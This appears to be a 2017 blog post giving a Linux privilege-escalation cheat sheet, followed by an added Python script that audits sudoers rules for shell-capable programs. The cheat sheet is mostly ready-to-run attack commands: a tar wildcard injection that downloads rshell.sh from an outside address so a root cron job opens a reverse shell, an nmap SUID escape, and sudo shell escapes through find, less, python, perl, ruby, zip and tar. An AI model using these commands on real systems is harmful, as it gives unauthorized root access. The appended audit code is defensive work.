Saturday, December 9, 2017

Linux Privilege Escalation Methods

1. Kernel Exploits
1.1 Dirty Cow Exploit: https://dirtycow.ninja/
2. Exploiting Weak Services
3.1 Wildcard Injection

Crontab:
0 5 * * * root tar -zcf /var/backups/home.tgz /home/*
==>
[user@localhost home]$ wget http://192.168.0.66/rshell.sh
[user@localhost home]$ touch "--checkpoint-action=exec=sh rshell.sh"
[user@localhost home]$ touch "--checkpoint=1"
<Open a listener on attack platform, wait for cronjob to execute rshell.sh.>

3.3 The Infamous SUID Executable
find directory -user root -perm -4000 -exec ls -ld {} \; >/tmp/setuid
[user@localhost home]$ nmap --interactive
nmap> !sh
# whoami
root
3.4 Exploiting SUDO Users
sudo find /etc -exec sh -i \;
[user@localhost]$ sudo
:shell
[root@localhost]#

[user@localhost]$ sudo less file.txt
!bash
[root@localhost]#

[user@localhost]$ sudo more long_file.txt
!bash
[root@localhost]#

[user@localhost]$ sudo python -c 'import pty; pty.spawn("/bin/sh")'
[user@localhost]$ sudo perl -e 'exec "/bin/sh";'
[user@localhost]$ sudo ruby -e 'exec "/bin/sh"'
sudo zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"
sudo tar cf /dev/null /tmp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash
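
An added example, not part of the original post: a defender's audit for the sudo rules that section 3.4 depends on. It parses sudoers-style rules and flags any that grant ALL or one of the programs listed above (find, less, more, python, perl, ruby, zip, tar). The sample rules, the user names and the function name audit_sudoers are constructed for illustration; aliases and include files are not resolved.

```python
import os
import re

# Programs that section 3.4 shows handing out a shell when run through sudo.
SHELL_CAPABLE = {"find", "less", "more", "python", "perl", "ruby", "zip", "tar"}

# Constructed sample sudoers content (not taken from any real host).
SAMPLE_SUDOERS = """\
# constructed example
Defaults env_reset
root    ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /bin/tar, /usr/bin/du
webdev  ALL=(root) /usr/bin/less /var/log/httpd/*, /usr/bin/python3
%ops    ALL=(ALL) NOPASSWD: /usr/sbin/service httpd restart
"""

# who  host = (runas) command-list
SPEC = re.compile(r"^(?P<who>\S+)\s+\S+?\s*=\s*(?:\([^)]*\)\s*)?(?P<cmds>.+)$")
# Leading tags such as "NOPASSWD:" or "NOEXEC: SETENV:"
TAG = re.compile(r"^(?:[A-Z_]+:\s*)+")


def audit_sudoers(text):
    """Return (who, command, reason) for every rule that can yield a root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or re.match(r"(Defaults|\w+_Alias)\b", line):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = TAG.sub("", cmd.strip())
            if not cmd:
                continue
            # Strip version suffixes so python3 / python2.7 count as python.
            name = re.sub(r"[\d.]+$", "", os.path.basename(cmd.split()[0]))
            if cmd == "ALL":
                findings.append((m.group("who"), cmd, "unrestricted"))
            elif name in SHELL_CAPABLE:
                findings.append((m.group("who"), cmd, "shell escape via " + name))
    return findings


if __name__ == "__main__":
    for who, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who:8} {cmd:32} {reason}")
```

Rules it flags are candidates for removal or for replacement with a fixed-purpose wrapper script that takes no user-controlled arguments.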

4. Physical Access Attacks
4.1 LUKS Vulnerability – Enter Key to Root in 70 Seconds
